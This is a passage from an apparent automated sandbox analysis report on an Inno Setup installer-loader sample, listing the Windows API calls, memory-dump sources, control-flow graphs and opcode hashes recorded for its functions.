                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 978128352-3001827809
                                                                          • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                          • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                          • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                          • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000), ref: 00409A28
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90), ref: 00409A5C
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02137C50), ref: 0040966C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                          • String ID: D
                                                                          • API String ID: 3356880605-2746444292
                                                                          • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                          • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                          • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                          • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                          • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                          • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                          • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                          • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                          • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                          • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                          • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                          • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                          • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                          APIs
                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID:
                                                                          • API String ID: 1948546556-0
                                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID:
                                                                          • API String ID: 442123175-0
                                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,02137CA4,0040A08C,00000000), ref: 004076B3
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                          Memory Dump Source
